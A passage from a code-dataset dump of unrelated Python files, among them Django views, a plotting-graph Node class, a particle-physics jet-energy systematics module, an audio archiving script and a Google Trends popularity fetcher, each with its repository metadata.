oneClass()\n temp = temp.data\n if temp[self.h.title] == class_name:\n aClass = temp\n break\n return aClass\n\n @property\n def data(self):\n self.createMetadata()\n return self._data","sub_path":"hydra/hydra2.py","file_name":"hydra2.py","file_ext":"py","file_size_in_byte":9876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"336677280","text":"# coding=utf-8\n__author__ = 'Kang'\nfrom django.http.response import HttpResponseRedirect\nfrom django.http.response import HttpResponse\nimport os\n\n\ndef show_welcome(request):\n from django.shortcuts import render_to_response\n return render_to_response('welcome.html')\n\n\ndef meta(request):\n meta_file = '/Users/Kang/Project/python/carDataShow/meta_txt/'\n os.chdir(meta_file)\n br = open('car_show.txt', 'r')\n lines = br.readlines()\n br.close()\n from django.shortcuts import render_to_response\n return render_to_response('meta.html', {'lines': lines})\n\n\ndef do_data(request):\n meta_file = '/Users/Kang/Project/python/carDataShow/meta_txt/'\n os.chdir(meta_file)\n br = open('car_show.txt', 'r')\n bw = open('/Users/Kang/Temp/car_tans.txt', 'w')\n lines = br.readlines()\n lines = [line.replace(',', '\\t') for line in lines]\n bw.writelines(lines)\n br.close\n bw.close\n ok = '数据转换成功!'\n from django.shortcuts import render_to_response\n return render_to_response('welcome.html', {'ok': ok})\n\n\ndef meta_transed(request):\n meta_file = '/Users/Kang/Temp/car_tans.txt'\n from django.shortcuts import render_to_response\n if os.path.exists(meta_file):\n br = open(meta_file, 'r')\n lines = br.readlines()\n br.close()\n os.remove(meta_file)\n return render_to_response('meta_transed.html', {'lines': lines})\n else:\n error = '请先转化!'\n return render_to_response('welcome.html', {'error': error})\n\n\ndef showneed_1_1(request):\n from carDB.models import Test1_One\n test1_1 = Test1_One.objects.all()\n from django.shortcuts import render_to_response\n\n if test1_1:\n empty = '数据库暂无数据'\n return render_to_response('welcome.html', {'empty': empty})\n else:\n dic = dict()\n for item in test1_1:\n dic = {item.car_type: item.point}\n return render_to_response('showneed_1_1.html', {'dic': dic})\n","sub_path":"python/carDataShow/carDataShow/views/welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"387992235","text":"class Owner:\n def __init__(self,data):\n self.Name=data[\"Name\"]\n self.FirstName=data[\"FirstName\"]\n self.LastName=data[\"LastName\"]\n self.Email=data[\"Email\"]\n self.HomeAddress=data[\"HomeAddress\"]\n self.DateOfBirth=data[\"DateOfBirth\"]\n self.HomePhone=data[\"HomePhone\"]\n self.SSN=data[\"SSN\"]\n self.PercentageOfOwnership=data[\"PercentageOfOwnership\"]","sub_path":"API/src/model/Owner.py","file_name":"Owner.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"585273234","text":"# SPDX-License-Identifier: BSD-3-Clause\n# Copyright (c) 2023 Scipp contributors (https://github.com/scipp)\n\nfrom __future__ import annotations\n\nimport uuid\nimport warnings\nfrom itertools import chain\nfrom typing import Any, Union\n\nfrom .system import VisibleDeprecationWarning\nfrom .view import View\n\n\n# TODO: Remove this in v23.05.0\ndef input_node(obj: Any) -> Node:\n \"\"\"\n Create a simple node that returns the supplied object when data is requested from\n it. This node has no parents, and typically lives at the top of a graph to provide\n the raw input data.\n\n .. deprecated:: v23.04.0\n Use :class:`Node` instead.\n\n Parameters\n ----------\n obj:\n The object to return when data is requested from the node.\n \"\"\"\n warnings.warn(\n \"plopp.input_node has been deprecated \"\n \"and will be removed in Plopp v23.05.0. \"\n \"Use plopp.Node instead.\",\n VisibleDeprecationWarning,\n )\n n = Node(lambda: obj)\n n.name = f'Input <{type(obj).__name__}>'\n return n\n\n\nclass Node:\n \"\"\"\n A node that can have parent and children nodes, to create a graph.\n A node can be constructed from a callable ``func``, or a raw object. In the case\n of a raw object, a node wrapping the object will be created.\n\n Parameters\n ----------\n func:\n The callable that is called when data is requested from the node. This can also\n be a raw object, in which case this becomes a callable that returns the object.\n *parents:\n Positional arguments that represent the positional arguments of the function\n ``func``.\n *kwparents:\n Keyword arguments that represent the keyword arguments of the function ``func``.\n \"\"\"\n\n def __init__(self, func: Any, *parents, **kwparents):\n func_is_callable = callable(func)\n self._input_value = None\n if func_is_callable:\n self.func = func\n else:\n self._input_value = func\n self.func = lambda: func\n self._id = uuid.uuid4().hex\n self.children = []\n self.views = []\n self.parents = [p if isinstance(p, Node) else Node(p) for p in parents]\n self.kwparents = {\n key: p if isinstance(p, Node) else Node(p) for key, p in kwparents.items()\n }\n for parent in chain(self.parents, self.kwparents.values()):\n parent.add_child(self)\n self._data = None\n\n if func_is_callable:\n # Set automatic name from function name and arguments\n args_string = ', '.join(\n chain(\n (f'arg_{i}' for i in range(len(self.parents))),\n self.kwparents.keys(),\n )\n )\n fname = getattr(self.func, \"__name__\", str(self.func))\n self.name = f'{fname}({args_string})'\n else:\n val_str = f'={repr(func)}' if isinstance(func, (int, float, str)) else \"\"\n self.name = f'Input <{type(func).__name__}{val_str}>'\n\n def __call__(self):\n return self.request_data()\n\n @property\n def id(self) -> str:\n \"\"\"\n The unique uuid of the node. This differs from the ``name`` which can be any\n string.\n \"\"\"\n return self._id\n\n @property\n def input_value(self) -> Any:\n \"\"\"\n The input value of the node, if it is an input node.\n \"\"\"\n return self._input_value\n\n @property\n def is_input_node(self) -> bool:\n \"\"\"\n Whether the node is an input node.\n \"\"\"\n return self._input_value is not None\n\n def remove(self):\n \"\"\"\n Remove the node from the graph.\n This attempts to remove clear the list of parents of the node.\n The operation fails is the node has children, as removing it would leave the\n graph in an ill-defined state.\n \"\"\"\n if self.children:\n raise RuntimeError(\n f\"Cannot delete node because it has children {self.children}.\"\n )\n for view in self.views:\n del view.graph_nodes[self.id]\n for parent in chain(self.parents, self.kwparents.values()):\n parent.children.remove(self)\n self.views.clear()\n self.parents.clear()\n self.kwparents.clear()\n\n def request_data(self) -> Any:\n \"\"\"\n Request data from the node. This in turn requests data from all of the node's\n parents, and passes those results as arguments to the node's own ``func``.\n The result from calling the function is cached, to limit the number of times\n the graph is traversed.\n \"\"\"\n if self._data is None:\n args = (parent.request_data() for parent in self.parents)\n kwargs = {\n key: parent.request_data() for key, parent in self.kwparents.items()\n }\n self._data = self.func(*args, **kwargs)\n return self._data\n\n def add_child(self, child: Node):\n \"\"\"\n Add a child to the node.\n \"\"\"\n self.children.append(child)\n\n def add_view(self, view: View):\n \"\"\"\n Add a view to the node.\n \"\"\"\n self.views.append(view)\n view.graph_nodes[self.id] = self\n\n def notify_children(self, message: Any):\n \"\"\"\n Notify all of the node's children with ``message``.\n Receiving a notification also means that the local copy of the data is\n out-of-date, and it is thus reset.\n\n Parameters\n ----------\n message:\n The message to pass to the children.\n \"\"\"\n self._data = None\n self.notify_views(message)\n for child in self.children:\n child.notify_children(message)\n\n def notify_views(self, message: Any):\n \"\"\"\n Notify the node's views with ``message``.\n\n Parameters\n ----------\n message:\n The message to pass to the views.\n \"\"\"\n for view in self.views:\n view.notify_view({\"node_id\": self.id, \"message\": message})\n\n def __repr__(self) -> str:\n return f\"Node(name={self.name})\"\n\n def __add__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x + y, self, other)\n\n def __radd__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x + y, other, self)\n\n def __sub__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x - y, self, other)\n\n def __rsub__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x - y, other, self)\n\n def __mul__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x * y, self, other)\n\n def __rmul__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x * y, other, self)\n\n def __truediv__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x / y, self, other)\n\n def __rtruediv__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x / y, other, self)\n","sub_path":"src/plopp/core/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"563940949","text":"\"\"\"\n`Veda audio project`_.\n\n.. _Veda audio project: https://sanskrit.github.io/groups/dyuganga/projects/audio/veda-audio/\n\"\"\"\n\nimport glob\nimport logging\nimport os\n\n# noinspection PyPep8\nimport pprint\n\nfrom audio_curation import audio_repo, archive_utility\n\n# Remove all handlers associated with the root logger object.\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(levelname)s:%(asctime)s:%(module)s:%(lineno)d %(message)s\"\n)\n\n# URL style:\n# https://aurobindo.ru/workings/matherials/rigveda/01/01-177.mp3\n# wget and urllib.request is blocked.\n\n\nclass VedaRepoBase(audio_repo.BaseAudioRepo):\n metadata = {\n \"title\" : \"kRShNa-yajur-veda taittirIya saMhitA IGNCA\",\n \"description\" : \"\"\"\n यजुर्-वेदः। तैत्तिरीय-संहिता।\n Courtsey : IGNCA and Indian taxpayers.\n Tech details- see https://sanskrit.github.io/groups/dyuganga/projects/audio/veda-audio/index.html\n \"\"\"\n }\n\n archive_id=\"yajurveda-taittirIya-ignca\"\n pass\n\n\ndef update_repos(dry_run=False):\n archive_audio_item = archive_utility.ArchiveAudioItem(archive_id=VedaRepoBase.archive_id, metadata=VedaRepoBase.metadata)\n repo = VedaRepoBase(repo_paths=[os.path.join(\"/home/vvasuki/Music/git-curation/veda-audio\", \"taittirIya_ignca\")], archive_audio_item=archive_audio_item, git_remote_origin_basepath=None)\n logging.info(pprint.pformat(repo.reprocess(dry_run=dry_run)))\n\n\nif __name__ == \"__main__\":\n update_repos(dry_run=False)","sub_path":"audio_curation_projects/veda/ignca/taittirIya.py","file_name":"taittirIya.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"463408622","text":"#!/usr/bin/env python\n\nimport copy\n\nfrom CMGTools.RootTools.RootTools import *\nfrom ROOT import gSystem\ngSystem.Load(\"libCondFormatsJetMETObjects\")\nfrom ROOT import JetCorrectorParameters, JetCorrectionUncertainty\n\nfrom math import *\n\n\n\n\nclass JES:\n\n def __init__(self, filename):\n self.jcp = JetCorrectorParameters(filename, \"\")\n self.jcu = JetCorrectionUncertainty(self.jcp)\n\n def uncertainty(self, pt, eta):\n self.jcu.setJetPt(pt)\n self.jcu.setJetEta(eta)\n return self.jcu.getUncertainty(True);\n \nclass MyEvent:\n def __init__(self):\n return;\n\nclass SystematicVariation:\n def __init__(self, isData):\n filejes = \"txt/Fall12_V7_MC_Uncertainty_AK5PFchs.txt\" \n if isData:\n filejes = \"txt/Fall12_V7_DATA_Uncertainty_AK5PFchs.txt\"\n self.jes = JES(filejes)\n\n def cloneEvent(self, event):\n cloneevent = MyEvent();\n cloneevent.J2Eta = event.J2Eta\n cloneevent.HEEJJcosthetastar = event.HEEJJcosthetastar\n cloneevent.HEEJJDeltaPhiZJ1 = event.HEEJJDeltaPhiZJ1\n cloneevent.ZJJEnergy = event.ZJJEnergy\n cloneevent.E1Mass = event.E1Mass\n cloneevent.VBFJ2Pt = event.VBFJ2Pt\n cloneevent.ZMMMass = event.ZMMMass\n cloneevent.VBFJ2NHFraction = event.VBFJ2NHFraction\n cloneevent.J1ChFraction = event.J1ChFraction\n cloneevent.HEEJJPhi = event.HEEJJPhi\n cloneevent.J2NHFraction = event.J2NHFraction\n cloneevent.E1Charge = event.E1Charge\n cloneevent.HEEJJDeltaPtZ = event.HEEJJDeltaPtZ\n cloneevent.HMMJJPt = event.HMMJJPt\n cloneevent.M1Mass = event.M1Mass\n cloneevent.HEEJJdetaVBF = event.HEEJJdetaVBF\n cloneevent.ZEEPhi = event.ZEEPhi\n cloneevent.VBFJ1NHFraction = event.VBFJ1NHFraction\n cloneevent.M2Phi = event.M2Phi\n cloneevent.M1Eta = event.M1Eta\n cloneevent.M2Charge = event.M2Charge\n cloneevent.E1Pt = event.E1Pt\n cloneevent.VBFJ2btag = event.VBFJ2btag\n cloneevent.VBFJ1EFraction = event.VBFJ1EFraction\n cloneevent.HEEJJdphiVBF = event.HEEJJdphiVBF\n cloneevent.J1Eta = event.J1Eta\n cloneevent.M2Energy = event.M2Energy\n cloneevent.J1Ntrk = event.J1Ntrk\n cloneevent.ZEEMass = event.ZEEMass\n cloneevent.E2Mass = event.E2Mass\n cloneevent.M2Mass = event.M2Mass\n cloneevent.J2btag = event.J2btag\n cloneevent.J1EFraction = event.J1EFraction\n cloneevent.ZMMCharge = event.ZMMCharge\n cloneevent.weight = event.weight\n cloneevent.njets = event.njets\n cloneevent.J2Ntrk = event.J2Ntrk\n cloneevent.J2Phi = event.J2Phi\n cloneevent.isVBFMatched = event.isVBFMatched\n cloneevent.VBFJ1Eta = event.VBFJ1Eta\n cloneevent.J2PFraction = event.J2PFraction\n cloneevent.ZMMPt = event.ZMMPt\n cloneevent.HMMJJDeltaPtZ = event.HMMJJDeltaPtZ\n cloneevent.ZMMEta = event.ZMMEta\n cloneevent.isDecayMatched = event.isDecayMatched\n cloneevent.ZJJEta = event.ZJJEta\n cloneevent.HMMJJClassifier = event.HMMJJClassifier\n cloneevent.ZJJPt = event.ZJJPt\n cloneevent.truezlepmass = event.truezlepmass\n cloneevent.VBFJ2Eta = event.VBFJ2Eta\n cloneevent.VBFJ2Ntrk = event.VBFJ2Ntrk\n cloneevent.HMMJJhelphi = event.HMMJJhelphi\n cloneevent.HEEJJhelcosthetaZl2 = event.HEEJJhelcosthetaZl2\n cloneevent.HEEJJhelcosthetaZl1 = event.HEEJJhelcosthetaZl1\n cloneevent.HMMJJdetaVBF = event.HMMJJdetaVBF\n cloneevent.VBFJ2Phi = event.VBFJ2Phi\n cloneevent.M1Charge = event.M1Charge\n cloneevent.HMMJJcosthetastar = event.HMMJJcosthetastar\n cloneevent.HMMJJMass = event.HMMJJMass\n cloneevent.iszee = event.iszee\n cloneevent.step = event.step\n cloneevent.E1Phi = event.E1Phi\n cloneevent.iszmumu = event.iszmumu\n cloneevent.VBFJ1Pt = event.VBFJ1Pt\n cloneevent.ZEEPt = event.ZEEPt\n cloneevent.VBFJ2ChFraction = event.VBFJ2ChFraction\n cloneevent.HEEJJEnergy = event.HEEJJEnergy\n cloneevent.J1Phi = event.J1Phi\n cloneevent.E2Charge = event.E2Charge\n cloneevent.HEEJJClassifier = event.HEEJJClassifier\n cloneevent.VBFJ2Energy = event.VBFJ2Energy\n cloneevent.J2Mass = event.J2Mass\n cloneevent.VBFJ1Energy = event.VBFJ1Energy\n cloneevent.J1Pt = event.J1Pt\n cloneevent.VBFJ2PFraction = event.VBFJ2PFraction\n cloneevent.HEEJJEta = event.HEEJJEta\n cloneevent.E2Energy = event.E2Energy\n cloneevent.E2Phi = event.E2Phi\n cloneevent.HEEJJphistarZl1 = event.HEEJJphistarZl1\n cloneevent.HEEJJphistarZl2 = event.HEEJJphistarZl2\n cloneevent.E2Pt = event.E2Pt\n cloneevent.HEEJJMass = event.HEEJJMass\n cloneevent.HEEJJmassVBF = event.HEEJJmassVBF\n cloneevent.VBFJ1Ntrk = event.VBFJ1Ntrk\n cloneevent.J2Pt = event.J2Pt\n cloneevent.HMMJJEta = event.HMMJJEta\n cloneevent.J2EFraction = event.J2EFraction\n cloneevent.ZMMPhi = event.ZMMPhi\n cloneevent.ZJJMass = event.ZJJMass\n cloneevent.VBFJ1PFraction = event.VBFJ1PFraction\n cloneevent.HMMJJmassVBF = event.HMMJJmassVBF\n cloneevent.ZMMEnergy = event.ZMMEnergy\n cloneevent.M2Eta = event.M2Eta\n cloneevent.VBFJ2EFraction = event.VBFJ2EFraction\n cloneevent.ZJJCharge = event.ZJJCharge\n cloneevent.HEEJJDeltaPhiZ = event.HEEJJDeltaPhiZ\n cloneevent.HEEJJDeltaPhiZJ2 = event.HEEJJDeltaPhiZJ2\n cloneevent.M1Phi = event.M1Phi\n cloneevent.J2ChFraction = event.J2ChFraction\n cloneevent.VBFJ2Mass = event.VBFJ2Mass\n cloneevent.VBFJ1btag = event.VBFJ1btag\n cloneevent.HMMJJdphiVBF = event.HMMJJdphiVBF\n cloneevent.J1Mass = event.J1Mass\n cloneevent.VBFJ1ChFraction = event.VBFJ1ChFraction\n cloneevent.ZEEEta = event.ZEEEta\n cloneevent.HEEJJPt = event.HEEJJPt\n cloneevent.HMMJJSumAbsEtaJ1J2 = event.HMMJJSumAbsEtaJ1J2\n cloneevent.HMMJJPhi = event.HMMJJPhi\n cloneevent.HEEJJSumAbsEtaJ1J2 = event.HEEJJSumAbsEtaJ1J2\n cloneevent.M1Energy = event.M1Energy\n cloneevent.J2Energy = event.J2Energy\n cloneevent.J1NHFraction = event.J1NHFraction\n cloneevent.J1Energy = event.J1Energy\n cloneevent.HMMJJEnergy = event.HMMJJEnergy\n cloneevent.nvertices = event.nvertices\n cloneevent.HMMJJDeltaPhiZ = event.HMMJJDeltaPhiZ\n cloneevent.M2Pt = event.M2Pt\n cloneevent.J1btag = event.J1btag\n cloneevent.HEEJJhelphiZl2 = event.HEEJJhelphiZl2\n cloneevent.E2Eta = event.E2Eta\n cloneevent.HEEJJhelphiZl1 = event.HEEJJhelphiZl1\n cloneevent.M1Pt = event.M1Pt\n cloneevent.ZEEEnergy = event.ZEEEnergy\n cloneevent.E1Energy = event.E1Energy\n cloneevent.J1PFraction = event.J1PFraction\n cloneevent.HMMJJDeltaPhiZJ2 = event.HMMJJDeltaPhiZJ2\n cloneevent.HMMJJDeltaPhiZJ1 = event.HMMJJDeltaPhiZJ1\n cloneevent.HMMJJphistarZl1 = event.HMMJJphistarZl1\n cloneevent.HMMJJphistarZl2 = event.HMMJJphistarZl2\n cloneevent.HMMJJhelphiZl2 = event.HMMJJhelphiZl2\n cloneevent.ZEECharge = event.ZEECharge\n cloneevent.HMMJJhelphiZl1 = event.HMMJJhelphiZl1\n cloneevent.VBFJ1Mass = event.VBFJ1Mass\n cloneevent.ZJJPhi = event.ZJJPhi\n cloneevent.VBFJ1Phi = event.VBFJ1Phi\n cloneevent.HEEJJhelphi = event.HEEJJhelphi\n cloneevent.HMMJJhelcosthetaZl2 = event.HMMJJhelcosthetaZl2\n cloneevent.HMMJJhelcosthetaZl1 = event.HMMJJhelcosthetaZl1\n #cloneevent.E1Et = event.E1Et\n\n return cloneevent \n\n\n def applyJES(self, event, up):\n cloneevent = self.cloneEvent(event)\n #for branch in event.GetListOfBranches():\n # print branch.GetName()\n #cloneevent.eval(branch.GetName()) = event.eval(branch.GetName())\n #sys.exit(1) \n #print event.ZJJMass\n uncj1 = self.jes.uncertainty(event.J1Pt, event.J1Eta) \n uncj2 = self.jes.uncertainty(event.J2Pt, event.J2Eta) \n uncvbfj1 = self.jes.uncertainty(event.VBFJ1Pt, event.VBFJ1Eta) \n uncvbfj2 = self.jes.uncertainty(event.VBFJ2Pt, event.VBFJ2Eta) \n j1 = [event.J1Pt*cos(event.J1Phi), \n event.J1Pt*sin(event.J1Phi), \n event.J1Pt/tan(2*atan(exp(-1*event.J1Eta))),\n sqrt(event.J1Pt*event.J1Pt*(1+1/(tan(2*atan(exp(-1*event.J1Eta)))*tan(2*atan(exp(-1*event.J1Eta))))))]\n\n j2 = [event.J2Pt*cos(event.J2Phi), \n event.J2Pt*sin(event.J2Phi),\n event.J2Pt/tan(2*atan(exp(-1*event.J2Eta))),\n sqrt(event.J2Pt*event.J2Pt*(1+1/(tan(2*atan(exp(-1*event.J2Eta)))*tan(2*atan(exp(-1*event.J2Eta))))))]\n\n vbfj1 = [event.VBFJ1Pt*cos(event.VBFJ1Phi),\n event.VBFJ1Pt*sin(event.VBFJ1Phi),\n event.VBFJ1Pt/tan(2*atan(exp(-1*event.VBFJ1Eta))),\n sqrt(event.VBFJ1Pt*event.VBFJ1Pt*(1+1/(tan(2*atan(exp(-1*event.VBFJ1Eta)))*tan(2*atan(exp(-1*event.VBFJ1Eta))))))] \n\n vbfj2 = [event.VBFJ2Pt*cos(event.VBFJ2Phi),\n event.VBFJ2Pt*sin(event.VBFJ2Phi),\n event.VBFJ2Pt/tan(2*atan(exp(-1*event.VBFJ2Eta))),\n sqrt(event.VBFJ2Pt*event.VBFJ2Pt*(1+1/(tan(2*atan(exp(-1*event.VBFJ2Eta)))*tan(2*atan(exp(-1*event.VBFJ2Eta))))))]\n\n if up: \n cloneevent.J1Pt = event.J1Pt+uncj1*event.J1Pt\n cloneevent.J2Pt = event.J2Pt+uncj2*event.J2Pt\n cloneevent.VBFJ1Pt = event.VBFJ1Pt+uncvbfj1*event.VBFJ1Pt\n cloneevent.VBFJ2Pt = event.VBFJ2Pt+uncvbfj2*event.VBFJ2Pt\n \n for i in range(4):\n j1[i] = j1[i]+uncj1*j1[i]\n j2[i] = j2[i]+uncj2*j2[i]\n vbfj1[i] = vbfj1[i]+uncvbfj1*vbfj1[i]\n vbfj2[i] = vbfj2[i]+uncvbfj2*vbfj2[i] \n\n else:\n cloneevent.J1Pt = event.J1Pt-uncj1*event.J1Pt\n cloneevent.J2Pt = event.J2Pt-uncj2*event.J2Pt\n cloneevent.VBFJ1Pt = event.VBFJ1Pt-uncvbfj1*event.VBFJ1Pt\n cloneevent.VBFJ2Pt = event.VBFJ2Pt-uncvbfj2*event.VBFJ2Pt \n\n for i in range(4):\n j1[i] = j1[i]-uncj1*j1[i]\n j2[i] = j2[i]-uncj2*j2[i]\n vbfj1[i] = vbfj1[i]-uncvbfj1*vbfj1[i]\n vbfj2[i] = vbfj2[i]-uncvbfj2*vbfj2[i]\n\n jsum = [j1[0]+j2[0], j1[1]+j2[1], j1[2]+j2[2], j1[3]+j2[3]]\n vbfjsum = [vbfj1[0]+vbfj2[0], vbfj1[1]+vbfj2[1], vbfj1[2]+vbfj2[2], vbfj1[3]+vbfj2[3]]\n modmass = sqrt(max(jsum[3]*jsum[3] - jsum[0]*jsum[0] - jsum[1]*jsum[1] - jsum[2]*jsum[2], 0.) )\n modmassvbf = sqrt(max(vbfjsum[3]*vbfjsum[3] - vbfjsum[0]*vbfjsum[0] - vbfjsum[1]*vbfjsum[1] - vbfjsum[2]*vbfjsum[2], 0.) )\n #print \"orig mass\", event.ZJJMass, \"modmass\", modmass\n cloneevent.ZJJMass = modmass\n cloneevent.VBFMass = modmassvbf\n\n #print event.ZMMMass\n\n return cloneevent\n\n\n#if __name__==\"__main__\":\n# sv=SystematicVariation(False) \n# print \"JES test (40, 0)\", sv.getJES(40., 0.)\n# print \"JES test (40, 1)\", sv.getJES(40., 1.)\n# print \"JES test (40, 2)\", sv.getJES(40., 2.)\n# print \"JES test (40, 3)\", sv.getJES(40., 3.)\n# print \"JES test (40, 4)\", sv.getJES(40., 4.)\n# print \"JES test (40, 4.7)\", sv.getJES(40., 4.7)\n# print \"JES test (40, 5)\", sv.getJES(40., 5.)\n \n \n","sub_path":"PyHLLJJHighMass/systematics.py","file_name":"systematics.py","file_ext":"py","file_size_in_byte":10451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"568930482","text":"from app1.models import *\nfrom app1.util.utils import *\n\ndef updateAdvance(request):\n '''\n get:\n http://127.0.0.1:8000/app1/updateAdvance?ano=007&starttime=8:30&endtime=11:30&week=星期一\n 调用参数:\n ano:预排课表编号\n starttime:课程开始时间\n endtime:课程结束时间\n week:星期\n post:\n http://127.0.0.1:8000/app1/updateAdvance\n '''\n try:\n if(request.method=='POST'):\n teadata=json.loads(request.body)\n data=teadata[\"data\"]\n for item in data:\n # aid=request.GET.get(\"ano\")\n # st=request.GET.get(\"starttime\")\n # en=request.GET.get(\"endtime\")\n # we=request.GET.get(\"week\")\n\n aid=item[\"ano\"]\n st=item[\"starttime\"]\n en=item[\"endtime\"]\n we=item[\"week\"]\n\n result=Advance.objects.filter(ano=aid).update(starttime=st,endtime=en,week=we)\n\n result=Advance.objects.all().values(\"starttime\",\"endtime\",\"week\",\"teacher__tno\",\"teacher__tname\",\"classroom__crno\",\"course__cno\",\"course__cname\")\n return showJsonresult(result)\n except Exception as e:\n response={}\n response['msg']=str(e)\n response['err_num']=1\n return showJsonerror(response)","sub_path":"day12/Django/app1/dateview/updateAdvance.py","file_name":"updateAdvance.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"549610357","text":"# -*- coding: utf-8 -*- \n\nimport pandas as pd\nfrom pytrends.request import TrendReq\nfrom datetime import date, datetime\nfrom datetime import timedelta\nfrom unidecode import unidecode\nimport sys\n\ndef print_usage():\n '''\n Função que printa a chamada correta em caso de o usuário passar o número errado\n de argumentos\n '''\n\n print ('Chamada Correta: python fetch_google_trends.py ')\n\ndef get_data_inicial(apresentacao):\n '''\n Caso a apresentação tenha sido feita em menos de 6 meses retorna a data da apre\n sentação, caso contrário, retorna a data de 6 meses atrás\n '''\n \n seis_meses_atras = date.today() - timedelta(days=180)\n if datetime.strptime(apresentacao,'%Y-%m-%d').date() > seis_meses_atras:\n return apresentacao\n else:\n return seis_meses_atras.strftime('%Y-%m-%d')\n\ndef formata_timeframe(passado_formatado):\n '''\n Formata o timeframe para o formato aceitável pelo pytrends\n '''\n\n return passado_formatado + ' ' + date.today().strftime('%Y-%m-%d')\n\ndef get_trends(termo, timeframe):\n '''\n Retorna os trends\n '''\n\n pytrend.build_payload(termo, cat=0, timeframe=timeframe, geo='BR', gprop='')\n \ndef get_popularidade(termo, timeframe):\n '''\n Retorna a popularidade de termos passados em um intervalo de tempo\n (timeframe)\n '''\n\n get_trends(termo, timeframe)\n\n return pytrend.interest_over_time()\n\ndef get_termos_relacionados(termo, timeframe):\n '''\n Retorna os termos relacionados a um termo passado\n em um período de tempo especificado\n '''\n\n get_trends(termo, timeframe)\n related_queries_dict = pytrend.related_queries()\n if (len(related_queries_dict) == 0):\n return pd.DataFrame()\n\n related_queries_df = pd.DataFrame.from_dict(related_queries_dict[termo[0]]['top'])[:3]\n\n return related_queries_df\n\ndef get_termos_mais_populares(nome_formal, apelido, timeframe):\n '''\n De acordo com os termos relacionados ao nome formal da proposição e a seu apelido\n retorna os 3 termos mais popularidades \n '''\n\n termos_relacionados_formal = get_termos_relacionados([nome_formal], timeframe)\n termos_relacionados_apelido = get_termos_relacionados([apelido], timeframe)\n termos_relacionados_total = termos_relacionados_formal.append(termos_relacionados_apelido)\n termos_relacionados_total = termos_relacionados_total.drop_duplicates(subset =\"query\")\n if (len(termos_relacionados_total) > 0):\n termos_relacionados_total = termos_relacionados_total.sort_values(by=['value'], ascending=False)[:3]['query']\n\n return termos_relacionados_total.values.tolist()\n\ndef calcula_maximos(pop_df, apelido, nome_formal):\n '''\n Calcula o máximo da pressão entre o apelido e o nome formal,\n entre os termos relacionados e a pressão geral\n '''\n\n termos = pop_df\n termos['max_pressao_principal'] = termos[[apelido,nome_formal]].max(axis=1)\n cols_termos_relacionados = termos.columns[~termos.columns.isin([apelido, nome_formal, 'date', 'max_pressao_principal', 'isPartial'])]\n termos['max_pressao_rel'] = termos[cols_termos_relacionados].max(axis=1) if (len(cols_termos_relacionados) > 0) else 0\n termos['maximo_geral'] = termos[['max_pressao_rel','max_pressao_principal']].max(axis=1)\n\n return termos\n\ndef agrupa_por_semana(pop_df):\n '''\n Agrupa por semana começando na segunda e calcula os máximos das colunas\n '''\n\n pop_df = pop_df.reset_index()\n pop_df = pop_df.groupby(['id_ext', pd.Grouper(key='date', freq='W-MON'), 'casa']).agg('max')\n pop_df = pop_df.reset_index()\n pop_df['date'] = pd.to_datetime(pop_df['date']) - pd.to_timedelta(7, unit = 'd')\n\n return pop_df\n\ndef write_csv_popularidade(df_path, export_path):\n '''\n Para cada linha do csv calcula e escreve um csv com a popularidade da proposição\n '''\n\n props_sem_popularidade = 0\n apelidos = pd.read_csv(df_path, encoding='utf-8')\n for index, row in apelidos.iterrows():\n timeframe = formata_timeframe(get_data_inicial(row['apresentacao']))\n apelido = row['apelido'].replace('(', '').replace(')', '')\n nome_formal = row['nome_formal']\n id_ext = str(row['id_ext'])\n casa = row['casa']\n\n print('Pesquisando a popularidade: ' + apelido)\n\n termos_relacionados = [nome_formal, apelido] + get_termos_mais_populares(nome_formal, apelido, timeframe)\n termos = [unidecode(termo_rel) for termo_rel in termos_relacionados]\n termos = set(termos)\n pop_df = get_popularidade(list(termos), timeframe)\n\n if (pop_df.empty):\n props_sem_popularidade += 1\n\n print ('O Google nao retornou nenhum dado sobre: ' + apelido)\n else:\n pop_df = calcula_maximos(pop_df, apelido, nome_formal)\n pop_df['id_ext'] = id_ext\n pop_df['casa'] = casa\n pop_df = agrupa_por_semana(pop_df)\n pop_df.to_csv(export_path + 'pop_' + id_ext + '.csv', encoding='utf8')\n if (props_sem_popularidade > 0):\n print('Não foi possível retornar a popularidade de ' + str(props_sem_popularidade) + '/' + str(len(apelidos)) + ' proposições.')\n\nif __name__ == \"__main__\":\n # Argumentos que o programa deve receber:\n # -1º: Path para o arquivo onde estão os apelidos, nomes formais e datas de apresentações\n # -2º: Path para a pasta onde as tabelas de popularidades devem ser salvas\n\n if len(sys.argv) != 3:\n print_usage()\n exit(1)\n\n df_path = sys.argv[1]\n export_path = sys.argv[2]\n\n pytrend = TrendReq()\n\n\n write_csv_popularidade(df_path, export_path)\n\n","sub_path":"fetch_google_trends.py","file_name":"fetch_google_trends.py","file_ext":"py","file_size_in_byte":5630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"192779440","text":"# https://programmers.co.kr/learn/courses/30/lessons/12971\r\n\"\"\"\r\ndp[i] = 